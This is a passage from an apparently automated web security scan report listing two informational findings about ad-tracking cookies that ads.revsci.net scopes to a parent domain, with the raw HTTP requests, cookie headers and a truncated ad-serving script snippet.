Set-Cookie: rsiPus_cWvO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6AGk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X5fA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xCLB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VeZQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GdYU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Nuyz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9LuU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8hPO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__hgI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zCmS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zB78=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3cxz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0Svs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tIki=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VmnB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VnuE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jU0b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FnTH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8VJk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gN5g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NGZ6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ykIF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lvxT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fsx9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mjM4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TAJT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_K27G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_cj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-r_t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_c9Qy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_okZc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_f9hD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_piZk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_amP2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jzux=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_S261=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_U-lS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GRM2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru44=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_05qP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WUD5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_37Ra=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pdjm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wQ9i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TgmM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_F1aA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtKf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qaRA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxPB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AOct=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Hvpv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_umeK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Bqao=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zXe7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mcS7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nSV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dXYl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_r5h4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YGYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uOdh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t8un=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UhXN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Yggs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tFKi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dMCl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jUrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HPp6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3Us7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UTqe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NyfH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_C1HA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hCo4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5uBS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mAGT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RObH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uEcy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xCvN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ebxh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_j_e_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9mAa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-4qM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fMbS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AKta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pXq4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_g7pa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zbII=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GEDh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_MRmN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5uiD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JGOr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Kry8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Y6sq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ccsv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BRp5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NNfV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wN_v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JOM8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QJXH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fBja=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tbUz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Gg_Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J1KA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DDfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6jYM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_P2pY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MKCJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tUnQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yzAv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E4FI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Fi8O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h2UP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3Yn9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LKfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BayI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RlWl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GMAx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tgf7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9Xoj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J2Ea=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__thJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ny38=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1tW9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nn6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RSEK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OkuD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9izr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Qh75=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AzD0="MLtXrtUvti9nIDH3PvyuJZDWPvAb5rmAROC1vV+97tGjIq0KICE6IXNJpXbbtXk7SFglqytuSSifpijZkG/o9jHBIRbD9dvmp0CQ7vRdyOFH4TmnC/4OArLBdE8Hqi6o6R2PN9CCY2j1ylbdUwMYvE2vn/8yQK49ZcC2BmYHlP5TqASUaNd3SmSsruJoVhwue8QJ2Wq/HYRhwLuv+SBJuvZlzZ8Srsq2sIZOUsy2XdRmTdXJvYqRxcA7T88WNgvlk/lLSPEabgD9zqVd1+fJjSdNkIpDyzWJ1qz4xbxiA5hGMbHmUcIm4ZmDiZQ0lI1uhSsiwQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJT+DPwIU1E3iGYqC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeSFdjLp9DlTHNdGEjk0NgfVVxKB0nEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODlMOfrBlcpc/EVLjRSLRI8xjjkWUcghoozYMgm/2kBMR53HBmxFjQP21MJ6qziGy5KFhz2qPm8ZgoK1+g0XpR3Kmq3TMLtl541XiOq/36oUo4MMjpuSJ2y6bPEnEG4RNytq5QtjHrtihooQg0m/lM9wDkKucEZSkzX6We4wXeCOgPS/A7BkgZy4dkUCe4edTyMDn8fmzBehL604nI2WXe85cUQ528Q14Mxu+aNOLf9YTzBvNBA1KAIjb0O0Oi+VN4FyjgQ40clMB9mqvwoFps3YOlPjPNsS2F22gQ0ivIIHmWn30Wq88O2srD/dCkj0Oq6ZssNV3f5ACcOIA0D6ZRxJO4Y/m8AWjXZYq4CFnEAlfd0xA70nDa0Q06zNeeQaAGZwXSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1U1sBdJZ2TSEDKubr3jIuyeiHnV6czpfJN1f8orwva/UxRbG+LRbtTY2aEs6IY/TFsITJhj8EcKApWf9WLDkqxqP9jKe9KyQx0p8UjOe+FaH0SYBdgFXAEYUAyiJn6mQbIXwpc07tmy/OujBCnSzBh9l3JW67FffY5JV4bQSgkB8PsS+t2xidb1ikY/pSzxxHBee0GB"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:35 GMT
Content-Length: 940

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.12. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="pUMd5U+g/xMULsTCu+k7bfIrtGPDru2phlBoLeuoNfzhcyKV0v4e66ymwRf8sQAvMBtHyphI1d89vppu7+GTtHc81ZviwvzD0+T13dPv5yLdWC026bygOcgoBhWlndX/bqFGkOCQLHNPuGxFg+Rv+WRXlf/Ek1Yq8/wOPJ+T1zi6dv2OfuJEWpRpXdkwStGhjHefgqbGUJOFzgm6lXumZPudI1ur3H6poIG4XN+oq72CN1joRG9rDw4ZCPy3/BgaLnn/4lU70t5qBYPAVhshw8NrWAa2lsyt1g1gM6GKPOCI43TgdZSQilGDhE9IMICiwqhT3mDUXQBudDnXcEYmKXqcwh4KnN8ZpzAOSrJ7WE1pbGslC6X7wFB3pKV9Zsu6NbtMO31FQsuvlRunI5xxPdamEt7kY2EVjzzbmzTVxizSa9b3xlscu70TjKLqDpOaHosGHduftg4Epv+gVSczzkevXFWWxN0u1nnpPNLrbctfQmhfjFwkhwJbWSdFu7ySX1h+93uVK1v9nSO9EF2gdsrOwDU0PNKJ6bdGYIhBHXW2sbJdnlkH/Lfn/PkBEj2Hd9+bo+AJ4s3Oa3OeTgl3fpWZ1OtQVd8AeQsydIoKTtE/3QRuNlF2LV2jsQJHHucIwiETvNABG31SV74cz2jqv5zwiN7yalUwItqZn+d8NZT+50ZO5BxkJPG/UzpQgC3sdoKT8DaY9q4GXrs+cjZSQigz9xi9PGeGDr2RYdV3gmnDLWlv/w=="; udm_0=MLvv8FEJoS9npx4Ednq9YMBs9UFoa0U2h9b6OXFScmalI3t4IfxJSN67yaGjig+eWmkqtj8SzXF4+FJSFwnD3jITRGB3M0Yx9P0nIeSjmJWTu+2Ant8jI058EvH0wiyEJabVhVaTXVQSXwV7CHWoAqOobVyK81IZLoWuX5iT7y3M8ScOMJrBsHg8KYeni5z/E6hkDffwQLF8iPG05ZYtUA0alpaWPIsfSZP09AwQLM4/SgJ1qogzpZ0jrN1odBAf2GHOabJZ2/4wM0E9KajR5b9r7hs8/D8TnAx33g4xWC9OBwrBjlk/nj/WE9jC9AL72Q1kBbW0aVwbUxDtsLsy72TezNYbA9wMR2b4t22vECwG52fwQCCp7YspVUnDU7ZUV1l52zdrMb4YjTBOPHikYQIi6KiPQYghVDCclLvvsPXKTwn7ANcw4uw1QyIILtMe8Q/lzIaPJ05O3JfbFWzgRbe0YqmmAFOP4r8JBDXmcRXJm9lth61wKthFl0nuld0zu0mX5KsXzUQHvihVAnP3goULD8pxYQk0WTzgXLF0RvPvH9Tw2lObtmDphrk7b9pbmIm86p9+zbQ+4UQg+3N4Z/k2caDp4CkFmcHwEglLKqKmuOJUrD9WrWEf

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LRgg="MLtXrENrsF9nIAE6VbsxTYfBrZ+7yXZlgVXaxFRzRrgsYcYN/uRo6Id0hREh+v8Fc2uaokZKJpx2IXRk9Dyfi2c1aOHwzLio/qTPpYwOAxf+gMWWRw/SfZW0XEPOmFgqfwHDvNqdtPLRpDPvktgUQxq/DIIEL8fjYOTDXguU+JUnX8LmFcFTLYjxY+AM+B/tNXVIestR1daPcVjXKw1W/g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:16 GMT
Content-Length: 657

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.13. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=f09828 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rsiPus_gdim="MLtXrENrsF9nIAF6D3M7i/STKTrao6ps1I2AZRCKRzqmb8KlQQV8QUt2e6OtBgskIhKdoOJ1yHmxJTFNs4gGJaXsDU5PQU6EmolVCb+84ccdyh4mNwNw3VCsrR0XLTokq11VBVXRQRrYd0tfXWhpelt1T+ejBzpqRApnt1cCwfS5wRS+B+A8nIViBS1MMsBx87o2wCOaDxZn61tSbRAX"; rsi_us_1000000="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"; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZmgoUly6wQ7sd+KSCvcGhz3F7fYu+DFw; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; udm_0=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; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
